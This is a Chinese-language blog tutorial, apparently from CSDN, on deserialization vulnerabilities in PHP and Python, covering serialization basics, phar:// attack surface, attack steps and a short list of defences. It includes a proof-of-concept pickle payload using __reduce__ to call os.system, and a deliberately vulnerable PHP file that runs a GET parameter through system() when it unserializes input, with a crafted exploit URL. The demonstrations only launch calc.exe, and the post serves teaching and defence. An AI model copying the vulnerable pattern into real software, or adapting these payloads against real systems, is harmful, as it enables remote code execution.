网络安全-反序列化漏洞简介、攻击与防御

最新推荐文章于 2025-04-08 17:40:07 发布
最新推荐文章于 2025-04-08 17:40:07 发布
阅读量1.5w 收藏 23
点赞数 4
分类专栏: 网络安全 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lady_killer9/article/details/114730141
版权
本文介绍PHP与Python中的序列化及反序列化概念,包括不同数据类型的序列化示例、潜在的安全风险,如利用phar文件进行攻击,以及如何防御此类攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

简介

PHP序列化

Python序列化

攻击

PHP举例

Python举例

防御

参考

简介

各种语言都有反序列化漏洞,Java、PHP、Python等。序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转化为对象,也就是序列化的逆过程。

PHP序列化

php中序列化和反序列化函数为serialize、unserialize。

我们尝试对一些类型进行序列化

<?php
// 字符串类型
$s = "a string";
$serialized_s = serialize($s);
echo "字符串 a string 序列化后:$serialized_s<br>";
// 整型
$i = 10;
$serialized_i = serialize($i);
echo "整型 10 序列化后:$serialized_i<br>";
// 浮点型
$f = "10.6";
$serialized_f = serialize($f);
echo "浮点型 10.6 序列化后:$serialized_f<br>";
// 数组
$blogs=array("lady","killer","9");
$serialized_blogs = serialize($blogs);
echo "数组 ['lady','killer','9']序列化后:$serialized_blogs<br>";
?>

访问结果如下

php伪协议

php://phar

可用来进行反序列化漏洞利用

PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件,在PHP 5.3 或更高版本中默认开启,这个特性使得 PHP也可以像 Java 一样方便地实现应用程序打包和组件化。一个应用程序可以打成一个 Phar 包,直接放到 PHP-FPM 中运行。

利用phar文件会以序列化的形式存储用户自定义的meta-data这一特性,拓展了php反序列化漏洞的攻击面。

利用phar扩展攻击面

Python序列化

python中需要注意的库又pickle、cPickle、PyYAML

python中有__reduce__函数,在反序列化时会运行

pickle可查看文章:Python-序列化与反序列化

"""
--coding:utf-8--
@File: serialize.py
@Author:frank yu
@DateTime: 2021.03.13 10:22
@Contact: frankyu112058@gmail.com
@Description:
"""
import pickle
import os


class Vulnerable():
    def __reduce__(self):
        return os.system, ('calc.exe',)


payload = pickle.dumps(Vulnerable())
print(payload)

执行上述代码可得到

b'\x80\x03cnt\nsystem\nq\x00X\x08\x00\x00\x00calc.exeq\x01\x85q\x02Rq\x03.'

攻击

思路

  • 找到反序列化接口
  • 构造恶意对象,获得序列化后的字节流
  • 将字节流传入反序列化接口

PHP举例

test.php

<?php
    class test{
	    function __destruct(){
		    echo "destruct...<br>";
	            $cmd = $_GET['cmd'];
		    system($cmd);
	    }
    }
    unserialize($_GET['o']);
?>

类test,销毁时会获取cmd参数,并执行,通过o反序列化对象。 因此,构造test类对象即可。

create.php

<?php
class test{}
$t = new test;
echo serialize($t);
?>

运行获得

 O:4:"test":0:{}

传参给test.php

test.php?o=O:4:"test":0:{}&cmd=start C:\Windows\System32\calc.exe 

Python举例

将刚才序列化后的字节流传入到pickle.loads()中,可唤起Windows的计算器。

防御

  • 鉴权,反序列化接口进行鉴权,仅允许后台管理员等特许人员才可调用
  • 白名单,限制反序列化的类
  • RASP(Runtime application self-protection,运行时应用自我保护)检测

参考

菜鸟教程-Java序列化

PHP手册-序列化接口

更多内容查看:网络安全-自学笔记

喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。

反序列化漏洞
weixin_46476861的博客
03-23 8844
什么是反序列化 就是把一个对象变成可以传输的字符串,目的就是为了方便传输。假设,我们写了一个class,这个class里面存有一些变量。当这个class被实例化了之后,在使用过程中里面的一些变量值发生了改变。以后在某些时候还会用到这个变量,如果我们让这个class一直不销毁,等着下一次要用它的时候再一次被调用的话,浪费系统资源。当我们写一个小型的项目可能没有太大的影响,但是随着项目的壮大,一些小问题被放大了之后就会产生很多麻烦。这个时候PHP就和我们说,你可以把这个对象序列化了,存成一个字符串,当你要用的时
php反序列化漏洞漏洞原理,如何防御漏洞?如何利用此漏洞
DXfighting_的博客
04-15 2988
原理:PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。 防御: 1)签名认证。 如果序列化的内容没有用户可控参数,仅仅是服务端存储和应用,则可以通过签名认证,来避免应用接受黑客的
一文掌握Java反序列化漏洞,从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
04-08 847
不过别慌,看完这篇文章,保证你也能玩转反序列化,成为安全界的弄潮儿!想象一下,你的程序运行了一段时间,产生了一些重要的数据,比如用户登录信息、购物车内容等等。这个漏洞曾经轰动一时,利用了Apache Commons Collections库中的一些类,构造了一个精妙的利用链,可以在目标服务器上执行任意代码。请务必遵守法律法规!方法,并且在里面执行了一些恶意代码(比如打开计算器),那么在反序列化时,就会执行你自定义的恶意代码,从而导致漏洞。方法的类,上传到服务器,让服务器进行反序列化,从而执行你的恶意代码。
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
白帽子凯哥聊黑客
12-23 1万+
首先,我们定义一个简单的Java类,该类具有可序列化的属性。// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法。
网络安全课第六节 反序列化漏洞的检测防御
fegus的博客
07-11 3677
上一讲介绍了 XXE 漏洞,它在业务场景中很容易用于读取敏感文件、进行代码执行,甚至也会用来渗透内网,也因此 XXE 漏洞常被当作一种严重漏洞来对待。本讲我将介绍另一种常用来实现远程代码执行的漏洞类型——反序列化漏洞,这几年经常出现在 Java 公共库,比如阿里的 fastjson,还有一些 Java 应用服务器,比如 JBoss。PHP 也有反序列化,比如著名的 Joomla 内容管理系统很多编程语言都有这种反序列化功能,若对反序列化的数据未做有效过滤和限制,就可能导致这种漏洞的产生。下面我就详细给你介绍
PHP反序列化漏洞
m0_57379855的博客
03-12 3166
PHP反序列化漏洞PHP对象类对象Magic函数PHP序列化反序列化不同类型的序列化pubilcprivate反序列化反序列化漏洞的出现CTF题目分析PHP反序列+文件包含攻防世界Typecho反序列化漏洞PHP反序列化漏洞防御 PHP对象 类 一个共享相同结构和行为的对象的集合 对象 类的实例 Magic函数 PHP序列化反序列化 序列化:把对象转化为可传输的字节序列过程称为序列化,可以在任何地方 反序列化:把字节序列还原为对象的过程称为反序列化。 不同类型的序列化 布尔值:b:
weblogic--反序列化漏洞测试Test
10-19
3. **CVE漏洞编号**:WebLogic反序列化漏洞往往特定的CVE(Common Vulnerabilities and Exposures)编号相关,比如CVE-2015-4852、CVE-2017-10271等。这些漏洞影响了WebLogic的不同版本,了解具体受影响的版本有助...
JBossMQJMS 反序列化漏洞(CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞...总之,理解并防范JBossMQJMS反序列化漏洞(CVE-2017-7504)是保持网络安全的关键。通过深入学习这些概念和技术,安全专业人员可以更有效地保护系统免受此类攻击,并提高整体的网络安全态势。
Fastjson反序列化漏洞:深入探讨安全防范
xycxycooo的博客
08-31 1795
通过本文的讲解,我们详细了解了Fastjson反序列化漏洞的原理、影响以及如何进行安全防范。Fastjson反序列化漏洞主要是由于Fastjson在反序列化过程中,对输入数据的安全性验证不足,导致攻击者可以构造恶意JSON数据,触发反序列化操作,进而执行任意代码或命令。为了避免这类漏洞,可以采取升级Fastjson版本、禁用@type自动类型解析、使用白名单机制和输入验证等安全防范措施。希望本文能够帮助你更好地理解和应用Fastjson反序列化漏洞安全防范。如果你有任何问题或需要进一步的解释,请随时提问。
网络安全漏洞安全反序列化漏洞深入分析
kali_Ma的博客
10-10 469
反序列化漏洞深入分析
网安学习路线!最详细没有之一!看了这么多分享网安学习路线的一个详细的都没有!
2401_84618514的博客
06-18 817
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
反序列化漏洞攻击原理(Dubbo反序列化漏洞剖析)
跳小闹成长记
02-22 1万+
目录 一、前言 二、序列化反序列化简介 三、反序列化怎样才会被利用? 1、说明 2、关键类说明-Transformer 3、关键类说明-TransformedMap 4、关键类说明-AnnotationInvocationHandler 5、攻击原理 6、攻击代码简介 四、Dubbo反序列化漏洞剖析 1、Dubbo的漏洞简介 2、漏洞复现步骤 3、如何解决漏洞 五、更...
反序列化漏洞原理和防御方式
热门推荐
wangyuxiang946的博客
07-18 1万+
攻击者通过构造恶意的参数,使数据在在反序列化后生成特殊的对象类型,从而执行恶意代码 问题的根源在于,反序列化时没有对生成的对象类型做限制
Java-序列化和反序列化的详细理解
Mr_Dragon的博客
11-20 403
序列化和反序列化 一、序列化和反序列化的概念 把对象转换为字节序列的过程称为对象的序列化;把字节序列恢复为对象的过程称为对象的反序列化。 对象的序列化主要有两种用途: 1) 把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中; 2) 在网络上传送对象的字节序列。 在很多应用中,需要对某些对象进行序列化,让它们离开内存空间,入住物理硬盘,以便长期保存。比如最常见的是Web服务器中的Session对象,当有 10万用户并发访问,就有可能出现10万个Session对象,内存可能吃不消,于是Web容器就会把一
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lady_killer9

感谢您的打赏,我会加倍努力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值